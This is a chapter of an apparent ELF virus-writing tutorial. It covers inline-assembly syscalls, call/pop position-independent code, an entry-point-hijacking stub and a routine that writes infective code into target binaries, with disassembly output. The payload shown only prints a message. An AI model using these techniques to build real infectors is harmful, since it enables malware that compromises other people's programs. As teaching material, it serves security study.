11. Doing it in C

 

The C Programming Language - A language which combines the flexibility of assembly language with the power of assembly language.

 anonymous

The language of evil I declared the code generated by gcc(1) to be unsuitable for a virus. And then rewrote the whole thing in assembly. A less drastic solution is to use inline assembly to correct only what's really necessary.

11.1. System calls

Have a look at the disassembly of function write in glibc. That code checks the return value of the system call and sets variable errno on error. We don't need this. Actually we can't access global variables at all. And Infection #1 does not care for the return code, anyway.

It is also remarkable that the code loads only the four required registers. The sources of glibc make great effort to provide optimal code for every case. I find the macros in glibc-2.2.4/sysdeps/unix/sysv/linux/i386/sysdep.h quite interesting.

For our needs a simple function will do. The line starting with a colon is a constraint. It somehow declares the value that eax has after the asm block to be the value of variable result. The following return statement would load the value of result into eax again, but fortunately gcc(1) optimizes this correctly. Of course the code would work without constraint and return. But the compiler would issue warning "no return statement in function returning non-void".

Red Hat's gcc-2.96-98 produces weird code if the assembly statements are grouped in a single asm block. In that case mov ebp,esp is done not on function entry, but after the asm. See All together now for a disassembly. do_syscall is the last part.

Note that we can't name our function plain syscall. There is already such a declaration in unistd.h.

Source: src/doing_it_in_c/do_syscall.inc
#define write(fd, buf, count)	do_syscall(4, fd, buf, count)

int do_syscall(int number, ...)
{
  register int result;
  asm("push %ebx; push %esi; push %edi");
  asm(
    "mov 28(%%ebp),%%edi;"
    "mov 24(%%ebp),%%esi;"
    "mov 20(%%ebp),%%edx;"
    "mov 16(%%ebp),%%ecx;"
    "mov 12(%%ebp),%%ebx;"
    "mov  8(%%ebp),%%eax;"
    "int $0x80"
    : "=a" (result)
  );
  asm("pop %edi; pop %esi; pop %ebx");
  return result;
}

11.2. Position independent code

Previous examples needed a separate pass to build the insertable code. Output of the first pass is one chunk of bytes. The only interface to the infector is the place to patch with the original entry address (4 bytes at offset 1).

The crucial part are the lines in target_write_infection #1 (i) where we pass the address of the chunk of bytes to write(2). In a real virus these lines will also be part of inserted code. The naive approach is to patch these instructions on infection. But this again leads to a two-pass process. The first is required to find the offset of patches. A more comfortable approach is to make the code position independent by calculating absolute addresses at run-time. Note that option -fpic of gcc(1) does not help the problem at all.

-fpic

Generate position-independent code (PIC) suitable for use in a shared library, if supported for the target machine. Such code accesses all constant addresses through a global offset table (GOT). The dynamic loader resolves the GOT entries when the program starts (the dynamic loader is not part of GCC; it is part of the operating system). If the GOT size for the linked executable exceeds a machine-specific maximum size, you get an error message from the linker indicating that -fpic does not work; in that case, recompile with -fPIC instead. (These maximums are 16k on the m88k, 8k on the Sparc, and 32k on the m68k and RS/6000. The 386 has no such limit.)

The instruction pointer is a register that holds the address of the next instruction to execute. Unlike "real" registers there is no direct way to retrieve its value. A call pushes the current value of IP onto the stack and adds a relative offset to it. Offset 0 just continues with the following instruction. And if that instruction is a pop we load the the address of the pop instruction itself in a regular register.

In function we get_relocate_ofs we compare the actual value of IP with the location the linker had in mind when it built the original executable. If code is executed at the exact location the linker gave it in the original file, then eax will be exactly the address of label delta after the pop. And the following sub instruction will then set eax to zero.

Source: src/doing_it_in_c/get_relocate_ofs.inc
int get_relocate_ofs(void)
{
  int result;
  __asm__(
    "call   delta         ;"
    "delta:                "
    "pop    %%eax         ;"
    "sub    $(delta),%%eax;"
    : "=a" (result)
  );
  return result;
}

A dump from gdb(1) is not enough to demonstrate this function. I want to show that the last four bytes of the opcode of the call instruction are really zero.

Command: src/doing_it_in_c/intel.sh
#!/bin/sh
file=${1:-${TEVWH_TMP}/doing_it_in_c/e3i2/infector}
func=${2:-get_relocate_ofs}
count=${3:-1}

[ -f "${file}" ] || exit 1
location=$(
	${TEVWH_PATH_NM} ${file} \
	| ${TEVWH_PATH_SED} -ne "/^[[:xdigit:]]* [tT] ${func}/s/ .*//p" \
	| ${TEVWH_PATH_TR} a-f A-F
)
[ -n "${location}" ] || exit 2
offset=$(
	${TEVWH_PATH_ECHO} "ibase=16; ${location} - ${TEVWH_ELF_BASE}" \
	| ${TEVWH_PATH_BC}
)
[ -n "${offset}" ] || exit 3
${TEVWH_PATH_NDISASM} -e ${offset} -o "0x${location}" -U ${file} \
| awk "{ print \$0; }
/ret/ && ++nr >= ${count} { exit 0; }"

Output: out/i386-redhat8.0-linux/doing_it_in_c/get_relocate_ofs.disasm
08048AC4  55                push ebp
08048AC5  89E5              mov ebp,esp
08048AC7  E800000000        call 0x8048acc
08048ACC  58                pop eax
08048ACD  2DCC8A0408        sub eax,0x8048acc
08048AD2  C9                leave
08048AD3  C3                ret

11.3. target_write_infection #2

We now have all parts to implement a position independent version of target_write_infection. This code works as part of a first stage infector. Output to prove it is at the end of this chapter. It should also work as part of an infection. But do you remember the paragraph about "exercise left to the reader"?

Compare this code with the first version, target_write_infection #1 (i). Instead of operating on a single variable, Infection #1, we write every byte between the start of infection and function end. The prototypes are required by the code of body. For reasons explained below, infection.inc and body.inc must lie next to each other. Anyway, the highlight of this chapter is the character constant msg.

Source: src/doing_it_in_c/write_infection.inc
int get_relocate_ofs(void);
int do_syscall(int, ...);
extern const char msg[];

#include "infection.inc"
#include "body.inc"
#include "get_relocate_ofs.inc"
#include "do_syscall.inc"

const char msg[] __attribute__ (( section(".text") )) =
  "ELF is dead baby, ELF is dead.\n";

void end() {}

bool target_write_infection(Target* t, size_t* code_size)
{
  enum { REST_OFS = ENTRY_POINT_OFS + sizeof(t->original_entry) };

  int ofs = get_relocate_ofs();
  char* r_begin = ofs + (char*)&infection;
  char* r_end = ofs + (char*)&end;
  unsigned size = r_end - r_begin;
  *code_size = size;

  TRACE_DEBUG(-1, "target_write_infection ENTRY_POINT_OFS=%d ofs=%d\n",
    ENTRY_POINT_OFS, ofs
  );

  /* i386: first byte is the opcode for "push" */
  CHECK_WRITE(r_begin, ENTRY_POINT_OFS);

  /* i386: next four bytes is the address to "ret" to */
  CHECK_WRITE(&t->original_entry, sizeof(t->original_entry));

  /* rest of infective code */
  CHECK_WRITE(r_begin + REST_OFS, size - REST_OFS);

  return true;
}

11.4. A section called .text

It is very difficult to persuade the linker to arrange object files in a specific order. But by putting all definitions into a single compilation unit (a .c that ends up in a .o) we are quite safe on that front. And though it is nowhere specified, most compilers will write definitions in the order they read them. So the "only" remaining problem is implementation specific classification of definitions. A small test program illustrates the problem.

Functions are ordered intuitively. However, constant data is put in a separate section called .rodata. And sections are ordered as whole. See the section-to-segment mapping in the output of readelf(1) at Segments of /bin/tcsh.

I see a few approaches to the problem.

Anyway, the real problem is accessing these bytes in a position independent fashion. For code this is more or less default. call and jmp work with relative offsets. Large contiguous switch blocks could get optimized as a lookup tables, but this is easy to work around. Explicit function pointers can be corrected manually with get_relocate_ofs. The same be could be done with items in virtual method tables. But then the table itself is accessed by compiler-generated code, which is hard to correct.

However, every data access requires explicit calculation through get_relocate_ofs. This includes innocent looking string literals. Basically you always have to look at the disassembly of your C code to go sure.

In our trivial example infection holds stub code written in assembler and is never accessed as data. Anyway, here is the documentation of gcc(1) on the issue.

section ("section-name")

Normally, the compiler places the objects it generates in sections like "data" and "bss". Sometimes, however, you need additional sections, or you need certain particular variables to appear in special sections, for example to map to special hardware. The "section" attribute specifies that a variable (or function) lives in a particular section.

11.5. The stub

This is the link between regular C code and the unsuspecting host. The requirements are:

Calculating the offset to patch with the original entry point definitely requires a separate pass. But good design can make this pass constant. We can use the same stub, with the same offset, for every kind of infective code.

The natural approach is to code the stub in a mixture of C and inline assembly and use ndisasm(1) to check the offset. This has the disadvantage of limited control. Functions compiled by gcc(1) are decorated with entry and exit code. The disassembly of The address of main is a fine example. I have no way to suppress the first two lines, push ebp and mov ebp,esp. Even worse, functions containing asm statements seem the defy all logic. Just see where mov ebp,esp is in the code of get_relocate_ofs. And I also don't see how to put code between pop ebp and ret. So we would have to build our own exit code using inline assembly. Basically a pop ebp and some kind of jmp. The exit code generated by gcc(1) would still be there, but just not used.

On the other hand the traditional way of mixing C and assembler code through separate .o files is not possible. Fortunately we have a tool that converts disassembly into a C style array constant: Dressing up binary code (i) This approach has one major problem, though. The assembly code is built independent of the C code. So the offset of the virus body (a plain C function) is not known during assembly of the stub. Patching the offset into the stub at run time is the obvious solution. Assuming a constant offset is the kind of black magic I prefer. But then my other hobby is selling innocent readers bull. The real motivation for the following hack is to recycle the framework from One step closer to the edge (i). There are a lot of possible variations.

The code below relies on prober alignment through the compiler. Because of the __attribute__ clause the character array infection starts at an address that is a multiple of 8. An assembler directive pads the stub with enough nop instruction to make its size a multiple of 8. Which means that any object placed after the infection is also aligned on a multiple of 8.

On i386 the largest built-in type of C compilers is double. And sizeof(double) is 8. So this number is typically the highest alignment used in a section. Another school of thought uses higher alignment to put data on cache line boundaries. And sections themselves are usually aligned on paragraphs (16 bytes), a term known since the days of real mode. But for our example there is no reason for compiler or assembler to insert padding bytes between infection and the following function, called body.

Source: src/one_step_closer/i2/i386_Linux_intel.S
		BITS 32

start:		push	dword 0		; replace with original entry address
		pushf
		pusha
		call	body
		popa
		popf
		ret

		align 8
body:		push	byte start + 1	; dummy operation to specifiy offset

Output = Source: out/i386-redhat8.0-linux/one_step_closer/i2/infection.inc
const unsigned char infection[]
__attribute__ (( aligned(8), section(".text") )) =
{
  0x68,0x00,0x00,0x00,0x00,      /* 00000000: push dword 0x0         */
  0x9C,                          /* 00000005: pushf                  */
  0x60,                          /* 00000006: pusha                  */
  0xE8,0x04,0x00,0x00,0x00,      /* 00000007: call 0x10              */
  0x61,                          /* 0000000C: popa                   */
  0x9D,                          /* 0000000D: popf                   */
  0xC3,                          /* 0000000E: ret                    */
  0x90                           /* 0000000F: nop                    */
}; /* 18 bytes (0x12) */
enum { ENTRY_POINT_OFS = 0x1 };

11.6. All together now

The only missing piece is the actual infection body. We use another piece of magic, built-in functions. From the documentation of gcc(1):

GCC normally generates special code to handle certain built-in functions more efficiently; for instance, calls to alloca may become single instructions that adjust the stack directly, and calls to memcpy may become inline copy loops. The resulting code is often both smaller and faster, but since the function calls no longer appear as such, you cannot set a breakpoint on those calls, nor can you change the behavior of the functions by linking with a different library.

Currently, the functions affected include abort, abs, alloca, cos, cosf, cosl, exit, _exit, fabs, fabsf, fabsl, ffs, labs, memcmp, memcpy, memset, sin, sinf, sinl, sqrt, sqrtf, sqrtl, strcmp, strcpy and strlen.

Source: src/doing_it_in_c/body.inc
void body()
{
  int ofs = get_relocate_ofs();
  const char* r_msg = ofs + msg;
  do_syscall(4, 1, r_msg, strlen(r_msg));
}

And a disassembly, just to go sure. It consists of infection, body, get_relocate_ofs and do_syscall, in that order. This is not all inserted code. The character constant msg is not shown.

Output: out/i386-redhat8.0-linux/doing_it_in_c/e3i2.disasm
08048A80  6800000000        push dword 0x0
08048A85  9C                pushf
08048A86  60                pusha
08048A87  E804000000        call 0x8048a90
08048A8C  61                popa
08048A8D  9D                popf
08048A8E  C3                ret
08048A8F  90                nop
08048A90  55                push ebp
08048A91  89E5              mov ebp,esp
08048A93  57                push edi
08048A94  53                push ebx
08048A95  E82A000000        call 0x8048ac4
08048A9A  8D98008B0408      lea ebx,[eax+0x8048b00]
08048AA0  89DF              mov edi,ebx
08048AA2  FC                cld
08048AA3  B9FFFFFFFF        mov ecx,0xffffffff
08048AA8  B200              mov dl,0x0
08048AAA  88D0              mov al,dl
08048AAC  F2AE              repne scasb
08048AAE  F7D1              not ecx
08048AB0  49                dec ecx
08048AB1  51                push ecx
08048AB2  53                push ebx
08048AB3  6A01              push byte +0x1
08048AB5  6A04              push byte +0x4
08048AB7  E818000000        call 0x8048ad4
08048ABC  8D65F8            lea esp,[ebp-0x8]
08048ABF  5B                pop ebx
08048AC0  5F                pop edi
08048AC1  C9                leave
08048AC2  C3                ret
08048AC3  90                nop
08048AC4  55                push ebp
08048AC5  89E5              mov ebp,esp
08048AC7  E800000000        call 0x8048acc
08048ACC  58                pop eax
08048ACD  2DCC8A0408        sub eax,0x8048acc
08048AD2  C9                leave
08048AD3  C3                ret
08048AD4  55                push ebp
08048AD5  89E5              mov ebp,esp
08048AD7  53                push ebx
08048AD8  56                push esi
08048AD9  57                push edi
08048ADA  8B7D1C            mov edi,[ebp+0x1c]
08048ADD  8B7518            mov esi,[ebp+0x18]
08048AE0  8B5514            mov edx,[ebp+0x14]
08048AE3  8B4D10            mov ecx,[ebp+0x10]
08048AE6  8B5D0C            mov ebx,[ebp+0xc]
08048AE9  8B4508            mov eax,[ebp+0x8]
08048AEC  CD80              int 0x80
08048AEE  5F                pop edi
08048AEF  5E                pop esi
08048AF0  5B                pop ebx
08048AF1  C9                leave
08048AF2  C3                ret

11.7. Off we go again